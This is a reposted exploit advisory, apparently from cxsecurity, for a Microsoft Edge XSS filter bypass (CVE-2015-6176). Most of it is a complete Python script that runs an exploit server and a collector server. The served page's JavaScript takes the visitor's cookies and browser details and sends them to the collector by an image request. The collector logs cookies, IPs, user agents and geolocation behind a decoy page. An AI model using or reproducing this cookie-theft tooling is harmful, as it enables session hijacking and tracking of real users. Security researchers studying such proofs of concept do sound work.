Microsoft Edge XSS Filter Bypass PoC
微软Edge XSS过滤器绕过PoC允许攻击者注入恶意脚本窃取用户数据(如cookies、IP地址、地理位置)并通过图像请求发送到攻击者服务器。漏洞被评为中等严重性。 2025-7-21 21:28:44 Author: cxsecurity.com(查看原文)

Microsoft Edge XSS Filter Bypass PoC

# Titles: Microsoft Edge XSS Filter Bypass PoC
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176

## Description

This Proof of Concept (PoC) demonstrates an XSS (Cross-Site Scripting) vulnerability bypass in Microsoft Edge's XSS filter. The vulnerability allows attackers to inject and execute malicious JavaScript despite Edge's built-in XSS protection mechanisms. This PoC works by crafting an HTML page that steals user cookies and sends them to an attacker-controlled collector server, bypassing Edge's filter. The collector server displays a large sea picture as a decoy, while logging stolen cookies, IP addresses, user agents, timestamps, and approximate geographic locations. This vulnerability is categorized as medium severity due to the potential for session hijacking and unauthorized actions performed with stolen cookies.

# STATUS: MEDIUM VULNERABILITY

[+]Exploit:

```python
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime

PORT = 8080
COLLECTOR_PORT = 9000

# HTML page with extended XSS exploit that sends lots of info via Image GET to collector
HTML_CONTENT = b"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
  try {
    var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
    var cookies = document.cookie || "";
    var url = window.location.href;
    var referrer = document.referrer;
    var language = navigator.language || "";
    var platform = navigator.platform || "";
    var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "";
    var screenRes = screen.width + "x" + screen.height;
    var data = {
      cookie: cookies,
      url: url,
      referrer: referrer,
      language: language,
      platform: platform,
      timezone: timezone,
      screen: screenRes
    };
    var query = Object.keys(data).map(function(k) {
      return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]);
    }).join("&");
    var img = new Image();
    img.src = attackerServer + "?" + query;
  } catch(e) {
    console.error("Error sending data:", e);
  }
};
</script>
</head>
<body>
<h1 style="color:red;">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
"""

# Collector page with large sea picture and centered message (Unicode allowed)
COLLECTOR_PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Collected</title>
<style>
  body {
    margin: 0;
    background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
    background-size: cover;
    height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
    font-family: Arial, sans-serif;
    font-size: 2em;
    text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
  }
</style>
</head>
<body>
<div>Thank you for visiting the collector page 🌊</div>
</body>
</html>
"""


class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path in ('/', '/index.html'):
            content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode())
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)


class CollectorHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == "/collect":
            query = parse.parse_qs(parsed_path.query)
            cookie = query.get("cookie", [""])[0]
            url = query.get("url", [""])[0]
            referrer = query.get("referrer", [""])[0]
            language = query.get("language", [""])[0]
            platform = query.get("platform", [""])[0]
            timezone = query.get("timezone", [""])[0]
            screen = query.get("screen", [""])[0]
            ip = self.client_address[0]
            user_agent = self.headers.get("User-Agent", "Unknown")
            timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            location = self.get_location(ip)
            if cookie:
                print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f" URL: {url}")
                print(f" Referrer: {referrer}")
                print(f" Language: {language}")
                print(f" Platform: {platform}")
                print(f" Timezone: {timezone}")
                print(f" Screen Resolution: {screen}")
                print(f" From IP: {ip}")
                print(f" User-Agent: {user_agent}")
                print(f" Location: {location}")
                print("-" * 50)
                # Save collected info to a file
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f" URL: {url}\n")
                    f.write(f" Referrer: {referrer}\n")
                    f.write(f" Language: {language}\n")
                    f.write(f" Platform: {platform}\n")
                    f.write(f" Timezone: {timezone}\n")
                    f.write(f" Screen Resolution: {screen}\n")
                    f.write(f" IP: {ip}\n")
                    f.write(f" User-Agent: {user_agent}\n")
                    f.write(f" Location: {location}\n")
                    f.write("-" * 50 + "\n")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            content = COLLECTOR_PAGE.encode('utf-8')
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    def get_location(self, ip):
        # Use free IP info service; fallback gracefully if no internet
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get("city", "")
                region = data.get("region", "")
                country = data.get("country", "")
                loc = data.get("loc", "")
                return f"{city}, {region}, {country} (coords: {loc})"
        except Exception:
            pass
        return "Location lookup failed or unavailable"


def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()[0]
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip


def run_exploit_server():
    with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
        print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
        httpd.serve_forever()


def run_collector_server():
    with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd:
        print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
        httpd.serve_forever()


if __name__ == "__main__":
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        exploit_thread = threading.Thread(target=run_exploit_server, daemon=True)
        exploit_thread.start()
        run_collector_server()
    except KeyboardInterrupt:
        print("\n[!] Shutting down servers. Goodbye!")
```

# Video: [href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
# Time spent: 03:35:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>



 


文章来源: https://cxsecurity.com/issue/WLB-2025070025